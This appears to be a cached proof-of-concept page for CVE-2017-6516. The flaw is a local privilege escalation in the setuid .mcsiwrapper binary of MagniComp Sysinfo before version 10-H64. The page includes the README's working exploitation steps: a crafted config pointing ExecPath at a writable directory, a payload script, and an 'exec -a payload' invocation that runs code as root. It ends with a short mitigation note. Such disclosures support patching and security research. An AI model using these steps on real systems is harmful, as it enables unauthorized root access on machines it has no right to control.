CVE-2017-6516 PoC — MagniComp Sysinfo 权限许可和访问控制问题漏洞

Source

https://github.com/Rubytox/CVE-2017-6516-mcsiwrapper-

Associated Vulnerability

Title:MagniComp Sysinfo 权限许可和访问控制问题漏洞 (CVE-2017-6516)
Description:MagniComp Sysinfo for Linux和UNIX platforms是美国MagniComp公司的一款基于Linux和UNIX平台的单一系统代理和查看器。基于Linux和UNIX平台的MagniComp Sysinfo 10-H64之前的版本中存在本地提权漏洞。本地攻击者可利用该漏洞获取提升的权限。

Description

A PoC / methodology to exploit CVE-2017-6516

Readme

# CVE-2017-6516

CVE-2017-6516 is a privilege escalation vulnerability that targets the `.mcsiwrapper` binary from MagniCorp SysInfo under version 10-H64. When this binary has the SUID bit set and is outdated, a user may execute arbitrary code as the owner of the binary - which is often `root`.

## Requirements

- The binary `.mcsiwrapper` must be setuid:
```bash
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
```
- The binary `.mcsiwrapper` must be under version 10-H64:
```bash
$ .mcsiwrapper --version
<Version under 10-H64>
```

## Exploitation
Create a file `config` with the following contents:
```bash
ExecPath=<Path to a writeable directory>
```

Create a payload executable file in the `ExecPath` directory, for instance:
```bash
#!/bin/sh
whoami
```
And make it executable:
```bash
$ chmod +x payload
```

Run the command:
```bash
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
```

## Mitigations
Update `.mcsiwrapper` to at least 10-H64.

File Snapshot


 [4.0K]  /data/pocs/b26fa53b3670e5ec2292682948b9bafbe7245310
└── [ 997]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!